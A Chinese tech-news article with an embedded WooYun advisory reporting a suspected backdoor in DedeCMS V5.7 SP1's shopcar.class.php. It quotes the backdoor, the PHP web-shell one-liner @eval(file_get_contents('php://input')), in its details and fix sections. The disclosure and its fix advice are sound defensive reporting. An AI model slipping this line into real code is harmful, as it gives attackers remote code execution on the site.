Dedecms疑似被植入后门 上传PHP后门可控制整个网站
Admin5站长网2月21日消息,昨日乌云漏洞报告平台(http://www.wooyun.org/)发布漏洞报告,称国内知名开源CMS软件Dedecms被入侵种植后门,影响使用dedecms的网站和企业,后门代码在/include/shopcar.class.php中,希望直接使用dedecms又未作审计的网站速度处理。360网站安全检测官方微博称经过工程师的测试,可以上传PHP后门来控制整个网站。目前已经将该后门加入到webscan网站安全扫描平台扫描库中,希望各网站及时进行扫描确认。
织梦内容管理系统(DedeCms)早期由IT柏拉图个人开发, 以简单、实用、开源闻名,受到广大个人站长的青睐。DedeCms站长用户众多,目前其官方还未对漏洞做出回应。希望广大使用Dedecms的站长能及时对网站进行安全检测,做好漏洞防范,等待官方给出解决办法。
漏洞概要
缺陷编号: WooYun-2012-05416
漏洞标题: Dedecms疑似被植入后门
相关厂商: Dedecms
漏洞作者: jsbug
提交时间: 2012-03-20
公开时间: 2012-03-20
漏洞类型: 成功的入侵事件
危害等级: 高
自评Rank: 10
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org
分享漏洞: 腾讯微博 新浪微博 Twitter 网易微博 豆瓣
漏洞详情
披露状态:
2012-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-03-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
DedeCMS V5.7 SP1正式版
UTF-8 GBK版本疑似被植入一句话后门
前几日下载并不存在此代码
详细说明:
shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
漏洞证明:
shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
修复方案:
删除@eval(file_get_contents('php://input'));
推荐阅读
- 怎么样的外链才算高质量外链
- 如何利用友情链接平台进行SEO工作
- 目前比较流行的外链建设方法的优劣势
- 新手常用的发外链方法
- 网站有了排名后如何维护好排名
- SEO详解图
- 使用dedecms做网站容易被挂马,如何做好防护
- 中小企业网站优化的问题
- 鸿景照明网站推广方案
- 选择一个优质空间的三点方法
- 百度百科会让你损失很大
- 做SEO网站优化只顾埋头发外链有用吗
- 淘宝客网站如何快速提升权重
- 关键词优化多久可以看到效果
- 网站优化应该注意的几个方面